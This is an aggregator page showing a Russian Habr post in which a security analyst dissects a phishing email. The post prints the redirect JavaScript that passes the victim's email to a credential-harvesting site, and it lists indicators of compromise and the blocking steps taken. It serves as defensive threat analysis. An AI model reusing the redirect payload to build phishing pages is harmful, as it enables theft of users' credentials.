惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

博客园 - 三生石上(FineUI控件)
Blog — PlanetScale
Blog — PlanetScale
B
Blog
GbyAI
GbyAI
爱范儿
爱范儿
月光博客
月光博客
N
Netflix TechBlog - Medium
T
Tailwind CSS Blog
G
Google Developers Blog
大猫的无限游戏
大猫的无限游戏
Vercel News
Vercel News
H
Hackread – Cybersecurity News, Data Breaches, AI and More
WordPress大学
WordPress大学
The GitHub Blog
The GitHub Blog
Recent Announcements
Recent Announcements
腾讯CDC
MyScale Blog
MyScale Blog
V
Visual Studio Blog
The Cloudflare Blog
Microsoft Security Blog
Microsoft Security Blog
A
About on SuperTechFans
Google DeepMind News
Google DeepMind News
Last Week in AI
Last Week in AI
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻

Все публикации подряд на Хабре

Ловим музу за клавиатуру: как айтишнику стать автором Что умеет Midjourney в 2026? Мой немного грустный разбор этого шикарного инструмента Никто не любит писать тесты, но ИИ может исправить это IPv8 выглядит как мечта. Поэтому почти наверняка не взлетит Производители вернули в продажу материнки с DDR3. Что происходит? Управление агентом с телефона через Telegram теперь в KodaCode От координации к лидерству: как меняется роль руководителя разработки Я сделала родителям бизнес вместо пенсии: зарабатываем 70 тысяч, мама не даёт продать В три раза быстрее приемка товара и оптимизация трудозатрат на 73%: как «РСТ-Инвент» помог Gulliver Group ИИ-шечный мир победил? О влиянии искусственного интеллекта на игропром Кремль снижает давление на Телеграмм пока Европа строит интернет по паспорту Как CEO, CTO и CIO за 8 часов собрали ИИ-директора, который умеет держать позицию под давлением Как (не) потерять домен за выходные Вместо 8 разных VPS: как я организовал практику студентам на одном сервере Почему твой Open Source проект не замечают? R&D: искусство управления неопределенностью в разработке AI-дефляция: вакансий для разработчиков больше, а рост зарплат — худший за 15 лет Мы отдали управление роботами OpenClaw. Что из этого вышло Галактический ID: система идентификации для всех форм разумной жизни Шесть основ бизнес-анализа: начинаем с вопроса «Кто в игре?» Код-ревью, в котором дело не в коде Данные переехали. Команда — нет Системной подход к сдаче OSWE в 2025 Почему комната управления реактором покрашена в цвет морской пены 4 YAML-файла вместо PySpark: как аналитикам строить пайплайны без разработчиков LLM-агент для поиска свободных доменов: автоматизируем подбор Когда, зачем и как правильно начинать новую сессию в Claude Code? Как я заставил нейросеть писать макросы для FreeCAD Анатомия ИИ‑агента для подбора персонала. От тысячи резюме к топ‑10 за минуты Опыт разработчика как экономика внимания
Фишинг с подменой URI: или как один хитрый редирект может...
Mr_Hartman · 2026-05-16 · via Все публикации подряд на Хабре

Всем привет! Хочу поделиться, возможно, не новым, но, на мой взгляд, довольно изощренным видом фишинга. Кто-то уже наверняка сталкивался с таким методом, а для кого-то он окажется в новинку.

ПРЕДУПРЕЖДЕНИЕ: Материалы данной статьи носят исключительно ознакомительный характер и публикуются в образовательных целях. Фишинг, равно как и любые разновидности социальной инженерии, направленные на получение НСД или нарушение целостности, доступности и конфиденциальности информации, являются уголовно наказуемыми деяниями. Информация предназначена для специалистов Blue Team в интересах противодействия интернет-мошенничеству.

Письмо

Открываю рабочую почту и вижу обратную связь от пользователя, в которой он предупреждает о попытке скама.

После нескольких учебных фишинговых кампаний бдительность пользователей существенно возросла, что не может не радовать)))

После нескольких учебных фишинговых кампаний бдительность пользователей существенно возросла, что не может не радовать)))

Обычная рядовая ситуация: юзера пытаются соскамить на письмо из техподдержки, но он сразу раскусил обман и перенаправил письмо в Отдел ИБ.

Вложение

Открываю сохраненное письмо. Вижу классическую попытку обмана, рассчитанную на невнимательность - сброс пароля от учетной записи. Письмо отправлено с домена "etrh.ru" (зарегистрирован в РУ-сегменте, но об этом далее).

Казалось бы, обычный немного топорный скам, с которым сталкиваешься ежедневно. Видно, что мошенники особо не готовились, скорее всего запустили в массы с помощью скрипта-рассыльщика.

Навожу курсор на гиперссылку и вижу адрес: https://zil-dom[.]ru/bitrix/admin/rrc/cvvc[.]html

Изучение ссылки

Проверяю ссылку с помощью curl, чтобы найти артефакты (стандартная процедура в таких ситуациях). И что же мы видим?

curl -s https://zil-dom.ru/bitrix/admin/rrc/cvvc.html

А видим мы ловкий трюк с использованием Java-скрипта, который автоматически редиректит нас на совершенно другой веб-ресурс.

https://threestarcrm.com/7yy/index.php?userid={victim_email}

Механизм атаки выглядит следующим образом: код на странице cvvc.html извлекает email жертвы из хэша URL и мгновенно (через 1 мс) перенаправляет браузер на основной фишинговый сервер:

var hash = window.location.hash;
var em = hash.split('#')[1];
window.setTimeout(function() {
    window.location.href = 'https://threestarcrm.com/7yy/index.php?userid=' + em;
}, 1);

ANY.RUN - REPORT

Прогоняю фишинговую ссылку через песочницу и получаю вполне очевидный результат - malicious activity

Форма авторизации любезно предлагает слить свои пароли злоумышленнику

Форма авторизации любезно предлагает слить свои пароли злоумышленнику

Индикаторы компрометации (IOC)

В таблице ниже — обнаруженные в ходе короткого расследования индикаторы. Считаю своим долгом предупредить коллег из Blue Team.

Тип

Значение

Описание

Домен

zil-dom.ru

Скомпрометированный сайт-редиректор

Домен

threestarcrm.com

Фишинговый сайт (основной)

IP

69.49.234.9

Актуальный IP фишингового сервера

IP-сеть

69.49.232.0/22

Сеть хостинг-провайдера (рекомендована к блокировке)

URL

zil-dom.ru/bitrix/admin/rrc/cvvc.html

Путь к вредоносному файлу

URL

threestarcrm.com/7yy/index.php

Путь к фишинговой форме

Email

dostavkaregion@luding.ru

Целевой email в тестовом образце

WHOIS

Creation Date: 02.04.2019

Домену 7+ лет (не «однодневка»)

Регистратор

PDR Ltd. (PublicDomainRegistry.com)

Индийский регистратор

Принятые меры

  1. На NGFW и антивирусе добавлены в черный список:

  • FQDN-объект: threestarcrm.com — блокировка по доменному имени

  • Subnet-объект: Fishing_69.49.232.0/22 — блокировка всей подсети хостинг-провайдера (69.49.232.0 – 69.49.235.255)

  • FQDN-объект: zil-dom.ru — блокировка скомпрометированного редиректора

    2. Направлено обращение хостерам с приложением пруфов. Обратной связи пока не получил (что немного огорчает)

Резюме (коротко)

Вряд ли я открыл какую-то тайну. Домены "zil-dom.ru" и "etrh.ru", вероятно, скомпрометированы. Оба зарегистрированы на PRIVATE PERSON. Домен "treestarcrm.com" живет в Интернете около 7 лет, но блокировать его, по-видимому, никто не спешит. Методика фишинга достаточно хитрая, потому что все браузеры по умолчанию выполняют Java-срипты.

Основная опасность - это подмена содержания гиперссылки. При грамотной разведке цели мошенники могли бы вставить туда любой легитимный адрес компании и без труда обманули бы жертву, которая попыталась бы проверить ссылку, наведя на нее курсор (о чем обычно просят всех юзеров, перед тем, как кликнуть по ней). Такие вот дела.

Надеюсь, что статья была полезна. Всем добра! :-)